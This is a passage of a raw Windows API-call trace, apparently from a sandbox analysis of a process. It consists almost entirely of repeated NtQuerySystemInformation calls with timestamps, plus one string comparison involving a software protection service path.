ResultLength=0x0) [0228.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0228.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec90, Length=0x28, ResultLength=0x0) [0228.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed00, Length=0x28, ResultLength=0x0) [0228.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0228.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x28, ResultLength=0x0) [0228.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed80, Length=0x28, ResultLength=0x0) [0228.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0228.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x20, ResultLength=0x0) [0228.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x20, ResultLength=0x0) [0228.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x20, ResultLength=0x0) [0228.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec60, Length=0x20, ResultLength=0x0) [0228.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee60, Length=0x38, ResultLength=0x0) [0228.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fece0, Length=0x20, ResultLength=0x0) [0228.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0228.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fec70, Length=0x20, ResultLength=0x0) [0228.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x50, ResultLength=0x0) [0228.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff070, Length=0x28, ResultLength=0x0) [0228.823] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0228.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x50, ResultLength=0x0) [0228.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x50, ResultLength=0x0) [0228.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff0f0, Length=0x50, ResultLength=0x0) [0228.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x38, ResultLength=0x0) [0228.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee50, Length=0x28, ResultLength=0x0) [0228.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee50, Length=0x28, ResultLength=0x0) [0228.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee50, Length=0x28, ResultLength=0x0) [0228.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feec0, Length=0x28, ResultLength=0x0) [0228.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x38, ResultLength=0x0) [0228.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x28, ResultLength=0x0) [0228.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fef40, Length=0x28, ResultLength=0x0) [0228.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fede0, Length=0x20, ResultLength=0x0) [0228.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x20, ResultLength=0x0) [0228.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x20, ResultLength=0x0) [0228.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed60, Length=0x20, ResultLength=0x0) [0228.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x38, ResultLength=0x0) [0228.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff020, Length=0x38, ResultLength=0x0) [0228.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feea0, Length=0x20, ResultLength=0x0) [0228.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee30, Length=0x20, ResultLength=0x0) [0228.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fee30, Length=0x20, ResultLength=0x0) [0228.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feea0, Length=0x50, ResultLength=0x0) [0228.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feea0, Length=0x50, ResultLength=0x0) [0228.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feea0, Length=0x50, ResultLength=0x0) [0228.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x50, ResultLength=0x0) [0228.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x50, ResultLength=0x0) [0228.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x50, ResultLength=0x0) [0228.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fed90, Length=0x50, ResultLength=0x0) [0228.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x38, ResultLength=0x0) [0228.992] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0228.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0228.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0228.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feaf0, Length=0x28, ResultLength=0x0) [0228.993] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb60, Length=0x28, ResultLength=0x0) [0228.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x38, ResultLength=0x0) [0228.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.994] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x28, ResultLength=0x0) [0228.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67febe0, Length=0x28, ResultLength=0x0) [0228.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea80, Length=0x20, ResultLength=0x0) [0228.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea00, Length=0x20, ResultLength=0x0) [0228.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea00, Length=0x20, ResultLength=0x0) [0228.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea00, Length=0x20, ResultLength=0x0) [0228.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x38, ResultLength=0x0) [0228.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fecc0, Length=0x38, ResultLength=0x0) [0228.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb40, Length=0x20, ResultLength=0x0) [0228.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fead0, Length=0x20, ResultLength=0x0) [0228.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fead0, Length=0x20, ResultLength=0x0) [0228.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.999] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb30, Length=0x50, ResultLength=0x0) [0229.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb30, Length=0x50, ResultLength=0x0) [0229.000] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb30, Length=0x50, ResultLength=0x0) [0229.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea20, Length=0x50, ResultLength=0x0) [0229.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea20, Length=0x50, ResultLength=0x0) [0229.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea20, Length=0x50, ResultLength=0x0) [0229.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fea20, Length=0x50, ResultLength=0x0) [0229.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.001] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe950, Length=0x38, ResultLength=0x0) [0229.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe780, Length=0x28, ResultLength=0x0) [0229.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe780, Length=0x28, ResultLength=0x0) [0229.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe780, Length=0x28, ResultLength=0x0) [0229.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe7f0, Length=0x28, ResultLength=0x0) [0229.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe950, Length=0x38, ResultLength=0x0) [0229.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe870, Length=0x28, ResultLength=0x0) [0229.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe870, Length=0x28, ResultLength=0x0) [0229.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe950, Length=0x38, ResultLength=0x0) [0229.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe7d0, Length=0x20, ResultLength=0x0) [0229.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x20, ResultLength=0x0) [0229.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x20, ResultLength=0x0) [0229.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe750, Length=0x20, ResultLength=0x0) [0229.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe950, Length=0x38, ResultLength=0x0) [0229.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe7d0, Length=0x20, ResultLength=0x0) [0229.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe760, Length=0x20, ResultLength=0x0) [0229.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe760, Length=0x20, ResultLength=0x0) [0229.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb30, Length=0x50, ResultLength=0x0) [0229.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67feb30, Length=0x50, ResultLength=0x0) [0229.012] 